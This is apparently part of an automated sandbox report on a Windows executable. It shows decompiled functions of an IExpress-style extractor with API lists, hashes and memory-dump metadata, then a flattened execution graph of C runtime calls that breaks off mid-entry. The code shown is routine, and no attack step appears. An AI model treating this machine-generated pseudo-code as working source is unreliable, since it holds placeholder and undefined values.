                                                                        • Instruction Fuzzy Hash: 1921C071A0021CABDB10EF65DCC5FEF77A8EB45314F0041A9B585A7280DAB45D85AFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F847E0(intOrPtr* __ecx) {
                                                                        				intOrPtr _t6;
                                                                        				intOrPtr _t9;
                                                                        				void* _t11;
                                                                        				void* _t19;
                                                                        				intOrPtr* _t22;
                                                                        				void _t24;
                                                                        				struct HWND__* _t25;
                                                                        				struct HWND__* _t26;
                                                                        				void* _t27;
                                                                        				intOrPtr* _t28;
                                                                        				intOrPtr* _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t33 = __ecx;
                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                        				if(_t34 != 0) {
                                                                        					_t22 = _t33;
                                                                        					_t27 = _t22 + 1;
                                                                        					do {
                                                                        						_t6 =  *_t22;
                                                                        						_t22 = _t22 + 1;
                                                                        					} while (_t6 != 0);
                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                        					 *_t34 = _t24;
                                                                        					if(_t24 != 0) {
                                                                        						_t28 = _t33;
                                                                        						_t19 = _t28 + 1;
                                                                        						do {
                                                                        							_t9 =  *_t28;
                                                                        							_t28 = _t28 + 1;
                                                                        						} while (_t9 != 0);
                                                                        						E00F81680(_t24, _t28 - _t19 + 1, _t33);
                                                                        						_t11 =  *0xf891e0; // 0x33d7bf0
                                                                        						 *(_t34 + 4) = _t11;
                                                                        						 *0xf891e0 = _t34;
                                                                        						return 1;
                                                                        					}
                                                                        					_t25 =  *0xf88584; // 0x0
                                                                        					E00F844B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                        					LocalFree(_t34);
                                                                        					L2:
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 =  *0xf88584; // 0x0
                                                                        				E00F844B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                        				goto L2;
                                                                        			}

                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00F84E6F), ref: 00F847EA
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00F84823
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00F84847
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F84851
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 359063898-3217841213
                                                                        • Opcode ID: c190e038688333596cac6fbab27dacc48fc0c49509f4fcdaf9f0375e561d1ef5
                                                                        • Instruction ID: d2b55955bc15a6e7ea0e2654f7c4de75b5bb33b86ecad95187507d65248e06c2
                                                                        • Opcode Fuzzy Hash: c190e038688333596cac6fbab27dacc48fc0c49509f4fcdaf9f0375e561d1ef5
                                                                        • Instruction Fuzzy Hash: BB11E975604A42AFE714AF249C18FF73B5AEB85750F048519FD829B341DB39AC06A760
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F83680(void* __ecx) {
                                                                        				void* _v8;
                                                                        				struct tagMSG _v36;
                                                                        				int _t8;
                                                                        				struct HWND__* _t16;
                                                                        
                                                                        				_v8 = __ecx;
                                                                        				_t16 = 0;
                                                                        				while(1) {
                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                        					if(_t8 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                        						continue;
                                                                        					} else {
                                                                        						do {
                                                                        							if(_v36.message != 0x12) {
                                                                        								DispatchMessageA( &_v36);
                                                                        							} else {
                                                                        								_t16 = 1;
                                                                        							}
                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                        						} while (_t8 != 0);
                                                                        						if(_t16 == 0) {
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				return _t8;
                                                                        			}

                                                                        APIs
                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00F8369F
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836B2
                                                                        • DispatchMessageA.USER32(?), ref: 00F836CB
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                        • String ID:
                                                                        • API String ID: 2776232527-0
                                                                        • Opcode ID: 832eaf69142da6d810ebc03950e016d223c3909ef33070e75cf7afd06e772c1b
                                                                        • Instruction ID: 08420924679f50936865472e67414d024ad850c8cd23b359424f5f36ee18f569
                                                                        • Opcode Fuzzy Hash: 832eaf69142da6d810ebc03950e016d223c3909ef33070e75cf7afd06e772c1b
                                                                        • Instruction Fuzzy Hash: 7A01A772D0021877DB305BAA9C4CEEB777CEBC5F20F10012AFE05E2294E561C640EB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E00F86517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                        				struct HRSRC__* _t6;
                                                                        				void* _t21;
                                                                        				struct HINSTANCE__* _t23;
                                                                        				int _t24;
                                                                        
                                                                        				_t23 =  *0xf89a3c; // 0xf80000
                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                        				if(_t6 == 0) {
                                                                        					L6:
                                                                        					E00F844B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                        					_t24 = _a16;
                                                                        				} else {
                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                        					if(_t21 == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						if(_a12 != 0) {
                                                                        							_push(_a12);
                                                                        						} else {
                                                                        							_push(0);
                                                                        						}
                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                        						FreeResource(_t21);
                                                                        						if(_t24 == 0xffffffff) {
                                                                        							goto L6;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t24;
                                                                        			}

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(00F80000,000007D6,00000005), ref: 00F8652A
                                                                        • LoadResource.KERNEL32(00F80000,00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F86538
                                                                        • DialogBoxIndirectParamA.USER32(00F80000,00000000,00000547,00F819E0,00000000), ref: 00F86557
                                                                        • FreeResource.KERNEL32(00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F86560
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                        • String ID:
                                                                        • API String ID: 1214682469-0
                                                                        • Opcode ID: c8bcdb0e43b1f7c0add6ed61c70baafe9e144c3ee17388a5bc395fcf375bc0be
                                                                        • Instruction ID: 038db0188b6b6ecfeb8200b909a4f3424ee9bf7b758b181cf6235dbd9acd4c24
                                                                        • Opcode Fuzzy Hash: c8bcdb0e43b1f7c0add6ed61c70baafe9e144c3ee17388a5bc395fcf375bc0be
                                                                        • Instruction Fuzzy Hash: DB012672500609BBDB106FA99C08EFB7B6DEB85770F08012AFE00E7190D7758C10BBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E00F865E8(char* __ecx) {
                                                                        				char _t3;
                                                                        				char _t10;
                                                                        				char* _t12;
                                                                        				char* _t14;
                                                                        				char* _t15;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t12 = __ecx;
                                                                        				_t15 = __ecx;
                                                                        				_t14 =  &(__ecx[1]);
                                                                        				_t10 = 0;
                                                                        				do {
                                                                        					_t3 =  *_t12;
                                                                        					_t12 =  &(_t12[1]);
                                                                        				} while (_t3 != 0);
                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                        				while(1) {
                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                        					if(_t16 <= _t15) {
                                                                        						break;
                                                                        					}
                                                                        					if( *_t16 == 0x5c) {
                                                                        						L7:
                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                        							_t16 = CharNextA(_t16);
                                                                        						}
                                                                        						 *_t16 = _t10;
                                                                        						_t10 = 1;
                                                                        					} else {
                                                                        						_push(_t16);
                                                                        						continue;
                                                                        					}
                                                                        					L11:
                                                                        					return _t10;
                                                                        				}
                                                                        				if( *_t16 == 0x5c) {
                                                                        					goto L7;
                                                                        				}
                                                                        				goto L11;
                                                                        			}









                                                                        APIs
                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00F82B33), ref: 00F86602
                                                                        • CharPrevA.USER32(?,00000000), ref: 00F86612
                                                                        • CharPrevA.USER32(?,00000000), ref: 00F86629
                                                                        • CharNextA.USER32(00000000), ref: 00F86635
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Prev$Next
                                                                        • String ID:
                                                                        • API String ID: 3260447230-0
                                                                        • Opcode ID: 95a30be76d7a37c4ae2dcc1a5f5bc2b1f06fb563fe469f0a4508d274fa917753
                                                                        • Instruction ID: 299e924a534fcbca7eb75718cccfd759b86cc50cca99043f17e5d2ca433e4bf5
                                                                        • Opcode Fuzzy Hash: 95a30be76d7a37c4ae2dcc1a5f5bc2b1f06fb563fe469f0a4508d274fa917753
                                                                        • Instruction Fuzzy Hash: 45F028328045D06EE7322B288CCC9FBBF9CCF87374B2901AFE491D6001E6150D06AB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F869B0() {
                                                                        				intOrPtr* _t4;
                                                                        				intOrPtr* _t5;
                                                                        				void* _t6;
                                                                        				intOrPtr _t11;
                                                                        				intOrPtr _t12;
                                                                        
                                                                        				 *0xf881f8 = E00F86C70();
                                                                        				__set_app_type(E00F86FBE(2));
                                                                        				 *0xf888a4 =  *0xf888a4 | 0xffffffff;
                                                                        				 *0xf888a8 =  *0xf888a8 | 0xffffffff;
                                                                        				_t4 = __p__fmode();
                                                                        				_t11 =  *0xf88528; // 0x0
                                                                        				 *_t4 = _t11;
                                                                        				_t5 = __p__commode();
                                                                        				_t12 =  *0xf8851c; // 0x0
                                                                        				 *_t5 = _t12;
                                                                        				_t6 = E00F87000();
                                                                        				if( *0xf88000 == 0) {
                                                                        					__setusermatherr(E00F87000);
                                                                        				}
                                                                        				E00F871EF(_t6);
                                                                        				return 0;
                                                                        			}








                                                                        APIs
                                                                          • Part of subcall function 00F86FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00F86FC5
                                                                        • __set_app_type.MSVCRT ref: 00F869C2
                                                                        • __p__fmode.MSVCRT ref: 00F869D8
                                                                        • __p__commode.MSVCRT ref: 00F869E6
                                                                        • __setusermatherr.MSVCRT ref: 00F86A07
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                        • String ID:
                                                                        • API String ID: 1632413811-0
                                                                        • Opcode ID: 403a9108639fcebffffdcf7a6fa3cd8571ea49ab9ad0cb62caf12369bba4c551
                                                                        • Instruction ID: f50726348e5ae571c8d528ac3aaccc42d652a483433e80a023c1e25af142567b
                                                                        • Opcode Fuzzy Hash: 403a9108639fcebffffdcf7a6fa3cd8571ea49ab9ad0cb62caf12369bba4c551
                                                                        • Instruction Fuzzy Hash: BAF098745093098FDB68BB34BD0E6E43B61FB05371B60061AE461862E5CF3ED546BB16
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:5.7%
                                                                        Dynamic/Decrypted Code Coverage:8.3%
                                                                        Signature Coverage:5%
                                                                        Total number of Nodes:1254
                                                                        Total number of Limit Nodes:45
SetUnhandledExceptionFilter UnhandledExceptionFilter 14321 40e725 GetCurrentProcess TerminateProcess 14320->14321 14322 40e719 __invoke_watson 14320->14322 14372 40ce09 14321->14372 14322->14321 14324 40e742 14324->14269 14327 411db8 14325->14327 14326 40eba2 14326->14285 14326->14287 14327->14326 14330 411dbc 14327->14330 14332 411e02 14327->14332 14328 40bfc1 ___strgtold12_l 63 API calls 14329 411dd8 14328->14329 14331 40e744 ___strgtold12_l 6 API calls 14329->14331 14330->14326 14330->14328 14331->14326 14332->14326 14333 40bfc1 ___strgtold12_l 63 API calls 14332->14333 14333->14329 14335 413cff 14334->14335 14337 413cf8 14334->14337 14336 40bfc1 ___strgtold12_l 63 API calls 14335->14336 14342 413d04 14336->14342 14337->14335 14339 413d33 14337->14339 14338 40e744 ___strgtold12_l 6 API calls 14340 40ebc8 14338->14340 14339->14340 14341 40bfc1 ___strgtold12_l 63 API calls 14339->14341 14340->14281 14340->14282 14341->14342 14342->14338 14344 4104e0 ___crtMessageBoxW 6 API calls 14343->14344 14345 413b8e 14344->14345 14346 413ba1 LoadLibraryA 14345->14346 14348 413c29 14345->14348 14347 413bb6 GetProcAddress 14346->14347 14350 413ccb 14346->14350 14349 413bcc 14347->14349 14347->14350 14352 4104e9 __decode_pointer 6 API calls 14348->14352 14366 413c53 14348->14366 14353 41046e __encode_pointer 6 API calls 14349->14353 14350->14290 14351 413c7e 14354 4104e9 __decode_pointer 6 API calls 14351->14354 14356 413c46 14352->14356 14357 413bd2 GetProcAddress 14353->14357 14354->14350 14355 4104e9 __decode_pointer 6 API calls 14363 413c96 14355->14363 14358 4104e9 __decode_pointer 6 API calls 14356->14358 14359 41046e __encode_pointer 6 API calls 14357->14359 14358->14366 14360 413be7 GetProcAddress 14359->14360 14361 41046e __encode_pointer 6 API calls 14360->14361 14362 413bfc GetProcAddress 14361->14362 14364 41046e __encode_pointer 6 API calls 14362->14364 14363->14351 14365 4104e9 __decode_pointer 6 API calls 14363->14365 14367 413c11 14364->14367 14365->14351 
14366->14351 14366->14355 14367->14348 14368 413c1b GetProcAddress 14367->14368 14369 41046e __encode_pointer 6 API calls 14368->14369 14369->14348 14371 40ba3c __VEC_memzero 14370->14371 14371->14320 14373 40ce11 14372->14373 14374 40ce13 IsDebuggerPresent 14372->14374 14373->14324 14380 4138fc 14374->14380 14377 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 14378 413723 __invoke_watson 14377->14378 14379 41372b GetCurrentProcess TerminateProcess 14377->14379 14378->14379 14379->14324 14380->14377 14382 40e7d7 GetProcAddress 14381->14382 14383 40e7ec ExitProcess 14381->14383 14382->14383 14384 40e7e7 CorExitProcess 14382->14384 14384->14383 14386 40b900 14385->14386 14387 40b85f 14385->14387 14388 40d2e3 _malloc 6 API calls 14386->14388 14394 40b8bc RtlAllocateHeap 14387->14394 14396 40b870 14387->14396 14397 40b8ec 14387->14397 14399 40d2e3 _malloc 6 API calls 14387->14399 14400 40b8f1 14387->14400 14402 40b8f8 14387->14402 14403 40b7fe 14387->14403 14389 40b906 14388->14389 14391 40bfc1 ___strgtold12_l 62 API calls 14389->14391 14390 40ec4d __FF_MSGBANNER 62 API calls 14390->14396 14391->14402 14393 40eaa2 __NMSG_WRITE 62 API calls 14393->14396 14394->14387 14395 40e7ee _malloc 4 API calls 14395->14396 14396->14387 14396->14390 14396->14393 14396->14395 14398 40bfc1 ___strgtold12_l 62 API calls 14397->14398 14398->14400 14399->14387 14401 40bfc1 ___strgtold12_l 62 API calls 14400->14401 14401->14402 14402->14297 14404 40b80a ___lock_fhandle 14403->14404 14405 40b83b ___lock_fhandle 14404->14405 14406 40d6e0 __lock 63 API calls 14404->14406 14405->14387 14407 40b820 14406->14407 14408 40def2 ___sbh_alloc_block 5 API calls 14407->14408 14409 40b82b 14408->14409 14411 40b844 14409->14411 14414 40d606 LeaveCriticalSection 14411->14414 14413 40b84b 14413->14405 14414->14413 14415->14302 14417 40daa0 HeapAlloc 14416->14417 14418 40da6c HeapReAlloc 14416->14418 14419 40dac3 VirtualAlloc 14417->14419 14420 40da8a 14417->14420 14418->14420 14421 40da8e 
14418->14421 14419->14420 14422 40dadd HeapFree 14419->14422 14420->14190 14421->14417 14422->14420 14424 40db20 VirtualAlloc 14423->14424 14426 40db67 14424->14426 14426->14189 14427->14193 14428->14126 14447 40d606 LeaveCriticalSection 14429->14447 14431 41066c 14431->14136 14433 4145f0 InterlockedIncrement 14432->14433 14434 4145f3 14432->14434 14433->14434 14435 414600 14434->14435 14436 4145fd InterlockedIncrement 14434->14436 14437 41460a InterlockedIncrement 14435->14437 14438 41460d 14435->14438 14436->14435 14437->14438 14439 414617 InterlockedIncrement 14438->14439 14441 41461a 14438->14441 14439->14441 14440 414633 InterlockedIncrement 14440->14441 14441->14440 14442 41464e InterlockedIncrement 14441->14442 14443 414643 InterlockedIncrement 14441->14443 14442->14139 14443->14441 14448 40d606 LeaveCriticalSection 14444->14448 14446 4106ba 14446->14141 14447->14431 14448->14446 14449->13938 14452 41265c 14450->14452 14454 4126c9 14452->14454 14460 416836 14452->14460 14453 4127c7 14453->13982 14453->13984 14454->14453 14455 416836 73 API calls _parse_cmdline 14454->14455 14455->14454 14457 414474 14456->14457 14458 41447b 14456->14458 14682 4142d1 14457->14682 14458->13977 14463 4167e3 14460->14463 14466 40ec86 14463->14466 14467 40ec99 14466->14467 14471 40ece6 14466->14471 14474 410735 14467->14474 14470 40ecc6 14470->14471 14494 413fcc 14470->14494 14471->14452 14475 4106bc __getptd_noexit 63 API calls 14474->14475 14476 41073d 14475->14476 14477 40ec9e 14476->14477 14478 40e79a __amsg_exit 63 API calls 14476->14478 14477->14470 14479 414738 14477->14479 14478->14477 14480 414744 ___lock_fhandle 14479->14480 14481 410735 __getptd 63 API calls 14480->14481 14482 414749 14481->14482 14483 414777 14482->14483 14485 41475b 14482->14485 14484 40d6e0 __lock 63 API calls 14483->14484 14486 41477e 14484->14486 14487 410735 __getptd 63 API calls 14485->14487 14510 4146fa 14486->14510 14489 414760 14487->14489 14491 41476e ___lock_fhandle 14489->14491 14493 
40e79a __amsg_exit 63 API calls 14489->14493 14491->14470 14493->14491 14495 413fd8 ___lock_fhandle 14494->14495 14496 410735 __getptd 63 API calls 14495->14496 14497 413fdd 14496->14497 14498 40d6e0 __lock 63 API calls 14497->14498 14499 413fef 14497->14499 14500 41400d 14498->14500 14502 413ffd ___lock_fhandle 14499->14502 14504 40e79a __amsg_exit 63 API calls 14499->14504 14501 414056 14500->14501 14505 414024 InterlockedDecrement 14500->14505 14506 41403e InterlockedIncrement 14500->14506 14678 414067 14501->14678 14502->14471 14504->14502 14505->14506 14507 41402f 14505->14507 14506->14501 14507->14506 14508 40b6b5 __crtGetStringTypeA_stat 63 API calls 14507->14508 14509 41403d 14508->14509 14509->14506 14511 4146fe 14510->14511 14517 414730 14510->14517 14512 4145d2 ___addlocaleref 8 API calls 14511->14512 14511->14517 14513 414711 14512->14513 14513->14517 14521 414661 14513->14521 14518 4147a2 14517->14518 14677 40d606 LeaveCriticalSection 14518->14677 14520 4147a9 14520->14489 14522 414672 InterlockedDecrement 14521->14522 14523 4146f5 14521->14523 14524 414687 InterlockedDecrement 14522->14524 14525 41468a 14522->14525 14523->14517 14535 414489 14523->14535 14524->14525 14526 414694 InterlockedDecrement 14525->14526 14527 414697 14525->14527 14526->14527 14528 4146a1 InterlockedDecrement 14527->14528 14529 4146a4 14527->14529 14528->14529 14530 4146b1 14529->14530 14531 4146ae InterlockedDecrement 14529->14531 14532 4146ca InterlockedDecrement 14530->14532 14533 4146da InterlockedDecrement 14530->14533 14534 4146e5 InterlockedDecrement 14530->14534 14531->14530 14532->14530 14533->14530 14534->14523 14536 41450d 14535->14536 14545 4144a0 14535->14545 14537 40b6b5 __crtGetStringTypeA_stat 63 API calls 14536->14537 14538 41455a 14536->14538 14539 41452e 14537->14539 14552 414581 14538->14552 14589 417667 14538->14589 14541 40b6b5 __crtGetStringTypeA_stat 63 API calls 14539->14541 14546 414541 14541->14546 14542 4144d4 14543 4144f5 14542->14543 14556 40b6b5 
__crtGetStringTypeA_stat 63 API calls 14542->14556 14547 40b6b5 __crtGetStringTypeA_stat 63 API calls 14543->14547 14545->14536 14545->14542 14550 40b6b5 __crtGetStringTypeA_stat 63 API calls 14545->14550 14554 40b6b5 __crtGetStringTypeA_stat 63 API calls 14546->14554 14557 414502 14547->14557 14548 4145c6 14551 40b6b5 __crtGetStringTypeA_stat 63 API calls 14548->14551 14549 40b6b5 __crtGetStringTypeA_stat 63 API calls 14549->14552 14553 4144c9 14550->14553 14558 4145cc 14551->14558 14552->14548 14555 40b6b5 63 API calls __crtGetStringTypeA_stat 14552->14555 14565 417841 14553->14565 14560 41454f 14554->14560 14555->14552 14561 4144ea 14556->14561 14562 40b6b5 __crtGetStringTypeA_stat 63 API calls 14557->14562 14558->14517 14563 40b6b5 __crtGetStringTypeA_stat 63 API calls 14560->14563 14581 4177fc 14561->14581 14562->14536 14563->14538 14566 4178cb 14565->14566 14567 41784e 14565->14567 14566->14542 14568 41785f 14567->14568 14569 40b6b5 __crtGetStringTypeA_stat 63 API calls 14567->14569 14570 417871 14568->14570 14571 40b6b5 __crtGetStringTypeA_stat 63 API calls 14568->14571 14569->14568 14572 417883 14570->14572 14573 40b6b5 __crtGetStringTypeA_stat 63 API calls 14570->14573 14571->14570 14574 417895 14572->14574 14576 40b6b5 __crtGetStringTypeA_stat 63 API calls 14572->14576 14573->14572 14575 4178a7 14574->14575 14577 40b6b5 __crtGetStringTypeA_stat 63 API calls 14574->14577 14578 4178b9 14575->14578 14579 40b6b5 __crtGetStringTypeA_stat 63 API calls 14575->14579 14576->14574 14577->14575 14578->14566 14580 40b6b5 __crtGetStringTypeA_stat 63 API calls 14578->14580 14579->14578 14580->14566 14582 417809 14581->14582 14588 41783d 14581->14588 14583 417819 14582->14583 14584 40b6b5 __crtGetStringTypeA_stat 63 API calls 14582->14584 14585 41782b 14583->14585 14586 40b6b5 __crtGetStringTypeA_stat 63 API calls 14583->14586 14584->14583 14587 40b6b5 __crtGetStringTypeA_stat 63 API calls 14585->14587 14585->14588 14586->14585 14587->14588 14588->14543 14590 417678 
14589->14590 14676 41457a 14589->14676 14591 40b6b5 __crtGetStringTypeA_stat 63 API calls 14590->14591 14592 417680 14591->14592 14593 40b6b5 __crtGetStringTypeA_stat 63 API calls 14592->14593 14594 417688 14593->14594 14595 40b6b5 __crtGetStringTypeA_stat 63 API calls 14594->14595 14596 417690 14595->14596 14597 40b6b5 __crtGetStringTypeA_stat 63 API calls 14596->14597 14598 417698 14597->14598 14599 40b6b5 __crtGetStringTypeA_stat 63 API calls 14598->14599 14600 4176a0 14599->14600 14601 40b6b5 __crtGetStringTypeA_stat 63 API calls 14600->14601 14602 4176a8 14601->14602 14603 40b6b5 __crtGetStringTypeA_stat 63 API calls 14602->14603 14604 4176af 14603->14604 14605 40b6b5 __crtGetStringTypeA_stat 63 API calls 14604->14605 14606 4176b7 14605->14606 14607 40b6b5 __crtGetStringTypeA_stat 63 API calls 14606->14607 14608 4176bf 14607->14608 14609 40b6b5 __crtGetStringTypeA_stat 63 API calls 14608->14609 14610 4176c7 14609->14610 14611 40b6b5 __crtGetStringTypeA_stat 63 API calls 14610->14611 14612 4176cf 14611->14612 14613 40b6b5 __crtGetStringTypeA_stat 63 API calls 14612->14613 14614 4176d7 14613->14614 14615 40b6b5 __crtGetStringTypeA_stat 63 API calls 14614->14615 14616 4176df 14615->14616 14617 40b6b5 __crtGetStringTypeA_stat 63 API calls 14616->14617 14618 4176e7 14617->14618 14619 40b6b5 __crtGetStringTypeA_stat 63 API calls 14618->14619 14620 4176ef 14619->14620 14621 40b6b5 __crtGetStringTypeA_stat 63 API calls 14620->14621 14622 4176f7 14621->14622 14623 40b6b5 __crtGetStringTypeA_stat 63 API calls 14622->14623 14624 417702 14623->14624 14625 40b6b5 __crtGetStringTypeA_stat 63 API calls 14624->14625 14626 41770a 14625->14626 14627 40b6b5 __crtGetStringTypeA_stat 63 API calls 14626->14627 14628 417712 14627->14628 14629 40b6b5 __crtGetStringTypeA_stat 63 API calls 14628->14629 14630 41771a 14629->14630 14631 40b6b5 __crtGetStringTypeA_stat 63 API calls 14630->14631 14632 417722 14631->14632 14633 40b6b5 __crtGetStringTypeA_stat 63 API calls 14632->14633 14634 
41772a 14633->14634 14635 40b6b5 __crtGetStringTypeA_stat 63 API calls 14634->14635 14636 417732 14635->14636 14637 40b6b5 __crtGetStringTypeA_stat 63 API calls 14636->14637 14638 41773a 14637->14638 14639 40b6b5 __crtGetStringTypeA_stat 63 API calls 14638->14639 14640 417742 14639->14640 14641 40b6b5 __crtGetStringTypeA_stat 63 API calls 14640->14641 14642 41774a 14641->14642 14643 40b6b5 __crtGetStringTypeA_stat 63 API calls 14642->14643 14644 417752 14643->14644 14645 40b6b5 __crtGetStringTypeA_stat 63 API calls 14644->14645 14646 41775a 14645->14646 14647 40b6b5 __crtGetStringTypeA_stat 63 API calls 14646->14647 14648 417762 14647->14648 14649 40b6b5 __crtGetStringTypeA_stat 63 API calls 14648->14649 14650 41776a 14649->14650 14651 40b6b5 __crtGetStringTypeA_stat 63 API calls 14650->14651 14652 417772 14651->14652 14653 40b6b5 __crtGetStringTypeA_stat 63 API calls 14652->14653 14654 41777a 14653->14654 14655 40b6b5 __crtGetStringTypeA_stat 63 API calls 14654->14655 14656 417788 14655->14656 14657 40b6b5 __crtGetStringTypeA_stat 63 API calls 14656->14657 14658 417793 14657->14658 14659 40b6b5 __crtGetStringTypeA_stat 63 API calls 14658->14659 14660 41779e 14659->14660 14661 40b6b5 __crtGetStringTypeA_stat 63 API calls 14660->14661 14662 4177a9 14661->14662 14663 40b6b5 __crtGetStringTypeA_stat 63 API calls 14662->14663 14664 4177b4 14663->14664 14665 40b6b5 __crtGetStringTypeA_stat 63 API calls 14664->14665 14666 4177bf 14665->14666 14667 40b6b5 